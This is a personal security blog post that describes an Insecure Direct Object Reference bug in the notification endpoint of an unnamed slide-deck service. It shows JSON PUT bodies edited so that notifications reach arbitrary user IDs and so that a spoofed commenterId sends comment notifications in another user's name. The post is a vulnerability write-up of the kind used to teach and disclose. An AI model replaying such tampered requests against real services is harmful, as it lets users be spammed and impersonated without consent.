cat ~/footstep.ninja/blog.txt

where I share my findings and whatnot

Story of an IDOR via HTTP

Oh! Yea, HTTP is the most common channel you could find an Insecure Direct Object Reference (IDOR) Vulnerability (IMO). I should call this an IDOR series, hahah!

In my last post, I mentioned there was a vulnerable HTTP PUT request on the target. The request was meant to send notification to other members of a team about a comment. The same endpoint was also used to notify other users when they are shared a slide. And both happened to be vulnerable to IDOR!

What could we do?

  1. Notify users they have been shared a deck
  2. Notify users about a comment
  3. Send comment notification on behalf of another user
  4. HTML Injection (I’ll discuss this in another post to keep things organized!)

Do you believe that?

Notify users they have been shared a deck

The body of PUT request looks like the following for sharing a deck

{"recipients":[{"type":"User","id":"12345678"}],"teamAlias":"EEqSBdu9z49","data":{"presentationUUID":"x14r5K1tFnH","comment":"Good stuff","senderProfileImage":"","text":"shared a deck"},"type":"DeckShare"}

Could you identify the vulnerable parameter?

Yes the id within the recipients parameter. And I could send the same notification to every other user by adding more users to the array which looks like the following:

{"recipients":[{"type":"User","id":"12345678"},{"type":"User","id":"12345679"},{"type":"User","id":"12345670"}],"teamAlias":"EEqSBdu9z49","data":{"presentationUUID":"x14r5K1tFnH","comment":"Good stuff","senderProfileImage":"","text":"shared a deck"},"type":"DeckShare"}

Notify users about a comment

And for a comment notification, it looked like this:

{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"","slideLocalId":"5p3nrib"}}

Here, apart from the commenterId what else do you notice?

Oh! Yes, the recipients. It was an empty array but then adding users like in the vulnerability to notify users about a shared deck works. The body now looks like the following:

{"type":"SlideComment","recipients":[{"type":"User","id":"12345678"},{"type":"User","id":"12345679"},{"type":"User","id":"12345670"}],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"","slideLocalId":"5p3nrib"}}

Send comment notification on behalf of another user

Also, the obvious commenterId in the previous body could be replaced with the id of any other user. And then one is able to notify users about a comment on behalf of another user.

Hope you're convinced

Thank you for your time. And I hope you enjoyed reading this.

Share on